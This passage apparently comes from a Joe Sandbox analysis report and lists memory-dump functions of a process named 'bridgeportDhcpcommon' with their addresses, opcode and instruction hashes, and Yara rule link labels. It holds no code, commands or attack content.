                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bab0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b93e6e7acee243b926d3088b8db61ff453e789b08bbae9437ab6901162686848
                                                                                                                                  • Instruction ID: bf693291c42240812002cd65488aa135425d5be48d27df2c4c7ab8873c353797
                                                                                                                                  • Opcode Fuzzy Hash: b93e6e7acee243b926d3088b8db61ff453e789b08bbae9437ab6901162686848
                                                                                                                                  • Instruction Fuzzy Hash: 6EE2D331B1991E4FEBA8EB6884B57B87392FFA8340F1541B9D01DC72D6DE64BD418B80
                                                                                                                                  Function 00007FFD9BAA0D74 Relevance: .3, Instructions: 266COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 236605e5b8ff568eb0d7ccb589aae2e6fdb5a0d40d3279e42a7ce33a3ef546c6
                                                                                                                                  • Instruction ID: b55ec42642c00beabf378f4e4d8a33c517afa6426f38d73118da01a78dc9e355
                                                                                                                                  • Opcode Fuzzy Hash: 236605e5b8ff568eb0d7ccb589aae2e6fdb5a0d40d3279e42a7ce33a3ef546c6
                                                                                                                                  • Instruction Fuzzy Hash: 0591C072A18A8D4FE798DF6888757A97FE1FF9A314F4001BAE049D72D6DB781811CB10
                                                                                                                                  Function 00007FFD9BAA0B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: c9$!k9$"s9
                                                                                                                                  • API String ID: 0-3426396564
                                                                                                                                  • Opcode ID: 4470e08967ed613b296afce63408d3fd13e033ffe4afc30e5f06ef80efccf24c
                                                                                                                                  • Instruction ID: 686306be4a690df05e0852d15206d5b05897dfacf84590a8f7bf2564703c99ef
                                                                                                                                  • Opcode Fuzzy Hash: 4470e08967ed613b296afce63408d3fd13e033ffe4afc30e5f06ef80efccf24c
                                                                                                                                  • Instruction Fuzzy Hash: F801F73A3299568FC611AB3EA4905D8BB50EAC2135B8601B7D144CB1A1E2101C9EC7E0
                                                                                                                                  Function 00007FFD9BAB3A79 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bab0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: M
                                                                                                                                  • API String ID: 0-3664761504
                                                                                                                                  • Opcode ID: 44525fd575992261979def29f32153c51023dd10f9c9c0488f51a1c04dc62c1c
                                                                                                                                  • Instruction ID: 7e293e87847a447f948362c5c3ece842b633de5fd7d8e33c511a4712fe521cc2
                                                                                                                                  • Opcode Fuzzy Hash: 44525fd575992261979def29f32153c51023dd10f9c9c0488f51a1c04dc62c1c
                                                                                                                                  • Instruction Fuzzy Hash: BCE06561A4B3C44FCB19AA3484694547FA0EF6720174A51EEC056CB1A3DA1DD886C701
                                                                                                                                  Function 00007FFD9BAD3C69 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: M
                                                                                                                                  • API String ID: 0-3664761504
                                                                                                                                  • Opcode ID: ab502c4148fea83b0877ed1d7bfa351d09c4c2f0612dbe10839e17ac564868cf
                                                                                                                                  • Instruction ID: 43756515a313015f382594f09591aab402b1257d4970a5cc334c2fbd33dd57b1
                                                                                                                                  • Opcode Fuzzy Hash: ab502c4148fea83b0877ed1d7bfa351d09c4c2f0612dbe10839e17ac564868cf
                                                                                                                                  • Instruction Fuzzy Hash: A1E06D7160E7C44FC71AAA348869454BFA0EF6720178A42EEC045CF1E3EA2D8889C701
                                                                                                                                  Function 00007FFD9BAC9329 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bac3000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 13c6aa1613b8499ab9238997d5505ee02ed6a470e895d757e21e7158a1fdb2ff
                                                                                                                                  • Instruction ID: fccb1b65466546408b31dce473351bce6f264d883f64bf02282f478a91c1dddb
                                                                                                                                  • Opcode Fuzzy Hash: 13c6aa1613b8499ab9238997d5505ee02ed6a470e895d757e21e7158a1fdb2ff
                                                                                                                                  • Instruction Fuzzy Hash: 62E0126154E3C44FCB1AEB7488698943FA0AE6B21078B40EEC186CF2B3E62DC949C701
                                                                                                                                  Function 00007FFD9BAC94D9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bac3000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 16bedd60f9927a11fc93583c22fba363b9671931c9460c4d41c5cbc5bcca993f
                                                                                                                                  • Instruction ID: 1f362d40cfaea4c412d5ecdd6d446c27ddbaf54b2d03c6cf2260a80495f5ef28
                                                                                                                                  • Opcode Fuzzy Hash: 16bedd60f9927a11fc93583c22fba363b9671931c9460c4d41c5cbc5bcca993f
                                                                                                                                  • Instruction Fuzzy Hash: F9E01A7154E7C44FCB16EB74886A9547FA0AE6721078B40EFC189CF1B3E62D8949C701
                                                                                                                                  Function 00007FFD9BAD8D18 Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 472ba53faf67dfb69290e881858baaaec577cfd24926faefcd904479de10c280
                                                                                                                                  • Instruction ID: 28551392011a71b4471b29064ef00b66f8698f2cbeb2de8c8eef42fc08b40698
                                                                                                                                  • Opcode Fuzzy Hash: 472ba53faf67dfb69290e881858baaaec577cfd24926faefcd904479de10c280
                                                                                                                                  • Instruction Fuzzy Hash: A0D05E705461848FCB08EA748069C647F91DE6A30038640ECD10ACB2B6EA2A8945C700
                                                                                                                                  Function 00007FFD9BAB0F40 Relevance: .8, Instructions: 787COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bab0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b6c9de9fc181402b048c818be6aef5f100380e029ddc9e741e1d93254414e289
                                                                                                                                  • Instruction ID: e89836f3411d9034fccc568388a76f5c59be0807512d06de5998385742b2acd8
                                                                                                                                  • Opcode Fuzzy Hash: b6c9de9fc181402b048c818be6aef5f100380e029ddc9e741e1d93254414e289
                                                                                                                                  • Instruction Fuzzy Hash: 2B42B231B1991E4FEBA8EB5884B17B87392FFA8350F1541B9D01DC72D7DE68AD428B40
                                                                                                                                  Function 00007FFD9BADBAD5 Relevance: .2, Instructions: 194COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3336b4fcc0d8675b5f1c429c44e4ec46c20dcc3b5fc719be3cd6949887cc50e1
                                                                                                                                  • Instruction ID: 427298623f6678dbb5578cc98005861e9d5c4ceb5b41a434e68d982573e9b8bd
                                                                                                                                  • Opcode Fuzzy Hash: 3336b4fcc0d8675b5f1c429c44e4ec46c20dcc3b5fc719be3cd6949887cc50e1
                                                                                                                                  • Instruction Fuzzy Hash: 56510831B19A5E4FEBA4EB5888A57A877D1FFD8310F85037AD00DCB1E6DD686D418780
                                                                                                                                  Function 00007FFD9BAC9573 Relevance: .2, Instructions: 193COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bac3000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a6e6642a04ce26f27f15372102dee193a1ddd926ab670f083b74771006f20a73
                                                                                                                                  • Instruction ID: dcd417814c44bd89971f770146065db593adfa43ce7833136dcee412159c33eb
                                                                                                                                  • Opcode Fuzzy Hash: a6e6642a04ce26f27f15372102dee193a1ddd926ab670f083b74771006f20a73
                                                                                                                                  • Instruction Fuzzy Hash: 3651C330B0980E4FDB99EF69C469AB977E1FF99314F510179E01DC72D6DF28A9418740
                                                                                                                                  Function 00007FFD9BAA08D0 Relevance: .2, Instructions: 156COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b13feccf18155b681bad705a5b1e7e16a8088f2dcc028a1401549d72e342d63f
                                                                                                                                  • Instruction ID: d447347bbf360960180664070df02d08600a29baa1fb9a7aab83980c55144692
                                                                                                                                  • Opcode Fuzzy Hash: b13feccf18155b681bad705a5b1e7e16a8088f2dcc028a1401549d72e342d63f
                                                                                                                                  • Instruction Fuzzy Hash: DE410712B0C55A0AE368F7AC64B5AF97781DF9933AF0445BBE44ECB1D7DD186C418284
                                                                                                                                  Function 00007FFD9BAC959C Relevance: .2, Instructions: 151COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bac3000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 51757cf5217e7e9b9502ff8baac5c141eafbfcb8ce112e051b73f0d161c11a6c
                                                                                                                                  • Instruction ID: 8418e2765dd4774891ea546ec70165f133fb2dc0756d67ce9a139baa22dde8c0
                                                                                                                                  • Opcode Fuzzy Hash: 51757cf5217e7e9b9502ff8baac5c141eafbfcb8ce112e051b73f0d161c11a6c
                                                                                                                                  • Instruction Fuzzy Hash: 7651BF30B1980A8FDB99EF59C4A4AA973E2FF99314F514179D01DC72D6DF38A841CB80
                                                                                                                                  Function 00007FFD9BAD30B8 Relevance: .1, Instructions: 130COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 77d54c6fbdcebeaaf3efd62c15c7c7d1d56462bafd50e5cfb14d6eb4af2c6965
                                                                                                                                  • Instruction ID: 54f708eac12efa2ec8cada4f2e3cab1608a5cde99d9b1a5f91d92e60564fe6f9
                                                                                                                                  • Opcode Fuzzy Hash: 77d54c6fbdcebeaaf3efd62c15c7c7d1d56462bafd50e5cfb14d6eb4af2c6965
                                                                                                                                  • Instruction Fuzzy Hash: F441A232B09A1D4FEB64EB58D8A4AE973E1EB94320F05427AD40DC7295DE786945CB80
                                                                                                                                  Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 25b2742eaaa501fde50e5089874de3d9631afd0172647c52ffebe833a195b6ef
                                                                                                                                  • Instruction ID: 460ca7af85b9252fd04763c360f0e3117cb7931ab7898808393ccdfc364b5143
                                                                                                                                  • Opcode Fuzzy Hash: 25b2742eaaa501fde50e5089874de3d9631afd0172647c52ffebe833a195b6ef
                                                                                                                                  • Instruction Fuzzy Hash: 77313936B0E24D8EE731EBA888611EC7B61EF41725F0541B7D05CCB1D3D9782689C765
                                                                                                                                  Function 00007FFD9BAA0998 Relevance: .1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0425d0f0f1b42c664721b94fd53aa99bec4ad442ca8ed5007358c53a84087f52
                                                                                                                                  • Instruction ID: e58bccd1bcd445bdd39151f8412dd83e62605d7f7bacb4052aab5bd7342df64a
                                                                                                                                  • Opcode Fuzzy Hash: 0425d0f0f1b42c664721b94fd53aa99bec4ad442ca8ed5007358c53a84087f52
                                                                                                                                  • Instruction Fuzzy Hash: F821C520B1995D0FF798FB6C94AA67972C3EB99326F4100BEE40DC32E7DD54AC418295
                                                                                                                                  Function 00007FFD9BAD7D70 Relevance: .1, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9607bfc2a5c3f4b5f0e884544b91f60e0d10ff00969fbc98f7efdaf10b1cfa4b
                                                                                                                                  • Instruction ID: dfbcc0dc2d70896cd87b121984961216c8990e403d431e32b97dc875d70e4324
                                                                                                                                  • Opcode Fuzzy Hash: 9607bfc2a5c3f4b5f0e884544b91f60e0d10ff00969fbc98f7efdaf10b1cfa4b
                                                                                                                                  • Instruction Fuzzy Hash: 8901D62AB0E5550AD324B27C7CA68E53B50CFA523F70803F7E24DCE5A7DC08904A87D4
                                                                                                                                  Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f99356922026e6e880ee7a92bad2d9d45a1a3b36c901df894e745226f9e58d5a
                                                                                                                                  • Instruction ID: 2fd90356b865a35136ea2973926417c0e99dfe7ab35acf3027c41e9a90ee891d
                                                                                                                                  • Opcode Fuzzy Hash: f99356922026e6e880ee7a92bad2d9d45a1a3b36c901df894e745226f9e58d5a
                                                                                                                                  • Instruction Fuzzy Hash: 8611A136A0E28D8FE722DFA888601DD7FB1EF42711F0645F7D048DB1A2D97466498764
                                                                                                                                  Function 00007FFD9BADE1AD Relevance: .0, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 454759c922b5750dedd24c32d90a362be9c0e18f41f3d39b972633ba9dd446f0
                                                                                                                                  • Instruction ID: a864755d09d803635b32d39b870abf3a29a46250a0e9860f2b88b4790fe8ec02
                                                                                                                                  • Opcode Fuzzy Hash: 454759c922b5750dedd24c32d90a362be9c0e18f41f3d39b972633ba9dd446f0
                                                                                                                                  • Instruction Fuzzy Hash: 96015232F0542E4AEFA4D79898643FD73E1EFE8311F064A76E009D7195DA68AA414780
                                                                                                                                  Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2a26a3ebc4bc9e74145091e1032dcb3bb35e2874727d4901efe39f9149ec395b
                                                                                                                                  • Instruction ID: 29b7ff40235aed8ed58873bd8658f74a1c50275defc08408daf90b1810143e1e
                                                                                                                                  • Opcode Fuzzy Hash: 2a26a3ebc4bc9e74145091e1032dcb3bb35e2874727d4901efe39f9149ec395b
                                                                                                                                  • Instruction Fuzzy Hash: B4019235A0E38D9FE721DFA4C85049CBFB1EF02710F1641E7D048DB1A2D9746645C754
                                                                                                                                  Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7332ddb06a322b94d9d1a086d782e2bd0ebfe3b8b6f5b591155510d7e2697513
                                                                                                                                  • Instruction ID: 3cddbe00afb4ff431c128674d65695716683e5987107ee65f5c6ba0062407818
                                                                                                                                  • Opcode Fuzzy Hash: 7332ddb06a322b94d9d1a086d782e2bd0ebfe3b8b6f5b591155510d7e2697513
                                                                                                                                  • Instruction Fuzzy Hash: 4201BC31A0E38D9FEB21DFA488A049CBFB1AF02700F1542E7D048CB2A3D9786A448754
                                                                                                                                  Function 00007FFD9BAD88AD Relevance: .0, Instructions: 38COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b0bc7bd19de957c656d4c1f70f952c63534e99dc7521a0c93103d3ec3a457ce7
                                                                                                                                  • Instruction ID: a062485ef70691557f72edf6e6b1847a2b5b20afc9384f58c100db5ba6bdc7be
                                                                                                                                  • Opcode Fuzzy Hash: b0bc7bd19de957c656d4c1f70f952c63534e99dc7521a0c93103d3ec3a457ce7
                                                                                                                                  • Instruction Fuzzy Hash: 7DF0342260E7C50FD31B173888754943FB0DE6316134A01E7C081CF1B3D85D888A8352
                                                                                                                                  Function 00007FFD9BAA0B77 Relevance: .0, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d89311434c9708ba25c6d473b2a50db4ece3f4970cc5127e1b5a28fbf1ec18f8
                                                                                                                                  • Instruction ID: aad96e1d7d97b683b76d1842787eed33bcf2f0f51b8489067d4b27900bf4e650
                                                                                                                                  • Opcode Fuzzy Hash: d89311434c9708ba25c6d473b2a50db4ece3f4970cc5127e1b5a28fbf1ec18f8
                                                                                                                                  • Instruction Fuzzy Hash: 88F0A03925EA49CFC742EB3DC8A58C4BB60FF02204B8A01FAD089CB5A2D3155C5ECB51
                                                                                                                                  Function 00007FFD9BADB909 Relevance: .0, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7b9d412235b02f3ebd63d2442816699b17ae80a3b16eb22797111223da92205b
                                                                                                                                  • Instruction ID: 5e7126f05cbdf4881c45ee340200cc1299084b3014dcb6f040ca477b80de1229
                                                                                                                                  • Opcode Fuzzy Hash: 7b9d412235b02f3ebd63d2442816699b17ae80a3b16eb22797111223da92205b
                                                                                                                                  • Instruction Fuzzy Hash: 6BF0E521B1DBC80FC769962D5866161BFF1DB9B20134A02EFC186CB6A3DD59AC898341
                                                                                                                                  Function 00007FFD9BACD959 Relevance: .0, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bac3000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 64a9c3bbb7f5388cf057e61f598ada5696dc9b997acc4e82ba8b3ca637a6e828
                                                                                                                                  • Instruction ID: 17befed0cbf27ab3611e07ed740970dfdafd5549d16128917ab4b55b2371d5a9
                                                                                                                                  • Opcode Fuzzy Hash: 64a9c3bbb7f5388cf057e61f598ada5696dc9b997acc4e82ba8b3ca637a6e828
                                                                                                                                  • Instruction Fuzzy Hash: 8DF0396161E3C44FD3139B3888254647FA0EA2720535B05FFD0CACB5B3D91A888AC312
                                                                                                                                  Function 00007FFD9BADB459 Relevance: .0, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f1dd106be1675b28366ec2004843c401d7150df9e67d420f988a9a43e725198e
                                                                                                                                  • Instruction ID: f35ba541a3b941cc13c9aaf341ebe6c6db9b7f5f07bdd7303d4c571ca020273c
                                                                                                                                  • Opcode Fuzzy Hash: f1dd106be1675b28366ec2004843c401d7150df9e67d420f988a9a43e725198e
                                                                                                                                  • Instruction Fuzzy Hash: 14E06D6160E3C48FCB1AAB34886D8547F60EE6720134A42EFC486CF1A7EA2D8885C712
                                                                                                                                  Function 00007FFD9BADB3C9 Relevance: .0, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
